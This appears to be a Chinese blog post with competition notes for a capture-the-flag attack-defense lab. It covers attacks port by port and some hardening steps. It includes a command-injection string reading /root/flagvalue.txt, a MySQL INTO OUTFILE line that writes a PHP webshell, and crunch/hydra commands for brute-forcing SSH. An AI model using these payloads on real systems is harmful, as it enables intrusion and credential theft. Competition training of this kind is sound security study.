网络空间安全——攻防对抗 2.0
- 信息收集,使用kali,扫描己方靶机端口
- 21端口的ftp的攻击
ftp攻击方式,查看本机有哪些普通用户
admin/123456和guest/123456
然后提交flag
- 22端口的ssh攻击
使用session –I 查看已经获取到的连接
使用session –I 序号 获取连接
- 23 telnet的攻击方式
- 防御21-23端口的攻击
- 改密码
- 或者删除500以上的用户
.
- 80http的攻击方法
进入自己的网站根目录
DisplayDirectory.php
此页面用来查看文件夹内的内容
使用&&加上cat /root/flagvalue.txt查看别人的flag,然后通过修改url,可以快速拿分
加固
FileSharing.php 文件上传漏洞
Kali生成木马
找到存储木马的路径
木马路径
使用工具连接
加固
WebShell.php
加固
通过查看TestConn.php页面可获知数据库密码为root/root
- 3306数据库攻击方式,使用kali远程连接别人的数据库
攻击代码
select '<?php system($_GET[\'a\']); ?>' INTO OUTFILE '/var/www/html/a.php';
攻击
加固漏洞
>use mysql;
>update user set Password=password('123456') where User='root';
修改密码即可
- 攻击10000以后的大端口后门
加固
写centos的iptables,关闭防火墙
清除防火墙预设规则
设置默认规则,拒绝所有进来的流量
设置默认规则,拒绝所有转发流量
设置默认规则,允许所有出去的流量
允许21,22,23,80,3306
保存防火墙规则
启动防火墙
查看结果
攻防对抗2
- 扫描
- 制作字典跑密码
crunch 6 6 -t 0000%% > /passw
开始破解自己的密码
hydra -l root -P /passw -t 4 ssh://172.16.120.250
现在使用putty进去到自己的靶机
- 21-23端口攻击方法一致
- 80端口攻击
生成字典
调出网站后台破解工具
得出网站后台
- 3306与上文一致
- 大端口修改
攻击方法一致
加固方法需要谨慎
法1:shell脚本一次成型
法2:把防火墙规则写在防火墙配置文件里面
网络空间安全——攻防对抗 2.0相关推荐
- 人工智能、网络空间对国家核安全的影响
来源:知远战略与防务研究所 人工智能技术是一把双刃剑,其在网络空间和核领域的应用,一方面能够为网络安全和核安全提供技术保障:另一方面,人工智能技术也可能为对手所用,通过网络空间对核武器体系进行渗透进攻 ...
- 智库专家称人工智能可提升网络空间适应能力
[概要]哈佛大学贝尔弗科学与国际事务中心网络安全项目主任Michael Sulmeyer等发表文章称,人工智能可提升网络空间适应能力. Michael Sulmeyer等在文章中表示,最近该中心的一位 ...
- 开始报名丨CCF C³-13@奇安信:透视俄乌网络战 —— 网络空间基础设施面临的安全对抗与制裁博弈...
CCF C³活动第十三期主题:透视俄乌网络战--网络空间基础设施面临的安全对抗与制裁博弈,将于7月8日周五晚(18:00-21:30),在奇安信安全中心举行,名额有限,报名从速. 自俄乌军事冲突正式爆 ...
- PSGAN——姿态稳健型可感知空间式生成对抗网络论文详细解读与整理
PSGAN--姿态稳健型可感知空间式生成对抗网络论文详细解读与整理 1.摘要 2.什么是PSGAN? 3.主要贡献 4.整体模块 5.目标函数 6.实验结果--部分化妆和插值化妆 7.定量比较 8.参 ...
- 网络空间问题之缺乏动态评估、安全开发、非对称攻防以及可信空间构造能力的问题
网络空间安全问题分类及说明[参考<网络空间安全问题分析与体系研究>表2.1网络空间安全问题] 从内容和种类上我们大概总结归纳了十七个要点,主要涵盖的网络空间安全重点问题有:取法高可靠.实时 ...
- 网络攻防windows命令_安恒EDR新版本本周发布|你还需要了解:攻防对抗之内网探测...
前情提要 前三期,我们详细介绍了攻防对抗的前三个阶段单机扩展.隧道搭建.远控持久化,干货满满的文章让大家在学习攻防对抗知识的同时也对EDR在攻防对抗场景的应用价值有了更深刻的了解. 传送门: [安恒E ...
- 网络空间对抗防御中的智能监测技术研究
摘 要: 网络空间数据流观测与威胁行为分析是国家网络空间安全防御中的重要方向.为 应对国家网络空间大规模数据流观测和不断涌现的网络威胁对抗防御重大需求,针对传统 基于时域.依赖先验知识的网 ...
- ISC 2020技术日丨 网络空间危机四伏,如何发现威胁的蛛丝马迹?
云风 发自 凹非寺 量子位 编辑 | 公众号 QbitAI 核心技术是强国之匙,当今世界,信息技术的迅猛发展特别是互联网技术的广泛应用,极大地促进了全球的经济文化发展.但与此同时,技术是一把" ...
- 2019年全国职业院校技能大赛中职组“网络空间安全”正式赛卷及其“答案”
2019年全国职业院校技能大赛中职组 "网络空间安全"正式赛卷 环境需要可以私信博主,答案在文章最末尾 一.竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第一阶段 单兵模 ...
最新文章
- 开放源码,华为鸿蒙HarmonyOS 2.0来了
- IOS使用Instrument-Time Profiler工具分析和优化性能问题
- 开发日记-20190903 关键词 C程序gcc编译过程
- C# MemoryStream先写后读的奇怪现象
- 使用记事本写java程序并编译运行过程
- 推荐腾讯最新重磅开源项目!
- vue手机端回退_vue移动端弹框组件 - osc_eiolhkks的个人空间 - OSCHINA - 中文开源技术交流社区...
- 台达伺服B2 调机杂说
- Jmeter 使用教程
- 【Web技术】969- 如何实现高性能的在线 PDF 预览
- 世嘉MD游戏开发【一】:win10环境下配置SGDK
- 冒犯有时是必要的:如何开启一段亲密关系?
- Android 9.0 wifi 热点 汇总
- 10G 网络变压器 10GBASE-T与1000Base-T区别
- php slik转wav_node.js安装wx-voice转换silk和mp3
- 计算机--计算机寓言
- Vivado_IDE(1)熟悉环境
- 【conda解决】安装Torchvision后使用PIL报错,ImportError: cannot import name 'PILLOW_VERSION' from 'PIL'
- 【深度学习】基于深度学习的linux服务器,需要搭建哪些服务,一步步搭建深度学习的环境,cuda,pytorch,opencv,ftp服务, nfs服务 docker等等
- fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
热门文章
- android snackbar源码,Android中Snackbar的使用方法及小技巧
- 从母亲做生意要会“混”的视角,看创业和工作
- Python的glob模块
- ggplot2箱线图+小提琴图
- 在linux下怎么安装mysql,手把手教你在Linux系统下安装MySQL
- org.springframework.web.multipart.MaxUploadSizeExceededException: Maximum upload size exceeded; nes
- Java运行时报错,the selection cannot be launched,and there are no recent launches
- 红外遥控实现回充原理红外发射与调制信号
- SAP ABAP 编号范围对象(SNRO)的监控管理和开发应用
- 善用搜索,主动探索,拒当伸手党